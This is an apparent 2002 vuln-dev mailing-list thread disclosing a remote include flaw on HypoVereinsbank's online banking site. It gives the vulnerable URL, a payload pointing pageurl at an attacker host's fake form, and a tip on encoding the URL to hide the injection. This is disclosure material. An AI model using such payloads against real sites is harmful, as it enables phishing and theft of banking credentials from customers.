Re: security issue at hypovereins bank

["Carlos Heller" <carlos.heller () ip-value de>]

I discovered two security issues on german onlinebanking systems, and it 
was hard to find a responsible person.
After a lot of expensive phonecalls we informed a german newspaper called 
express, get 500 buckets cash for the story and the hole was closed within 
one day...grin.....
cu
(C)arlos Heller
Project Manager 
ip value GmbH 
Goethering 58
D-63067 Offenbach
Phone: +49 69 800 88 114
Fax: +49 69 800 88 555
Mobile: +49 173 726 0137 

premioss - the ip value product suite for network operators 






"hnz geeratz[room23]" <staff () room23 org>
05.04.2002 12:12

 
        To:     <vuln-dev () securityfocus com>
        cc: 
        Subject:        security issue at hypovereins bank


hello

I found this security issue on the german hypovereins bank.
They are informed vor 3 months ago , still there is nothing changed.
The security hole will allow a atacker to include his own forms in the
website. This will give him an option to collect sensible information.
It  is a home bankin system!

take a look at this (long) URL:
http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu

now it is possible to change the
pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
part to something like pageurl=http://www.evol.org/fake_form.php

ore try :
http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de

so it is possible to include everything in this webpage.
The attacker could obscure the url in a form like:
pageurl=h%74t%70%3A%2Fw%77w%77............
so the user will not notice that the include form is not from the original
server

It opens a port to a new form of social hacking and data grabbing.

greetings hnz g


-- 
hnz geeratz | staff () room23 org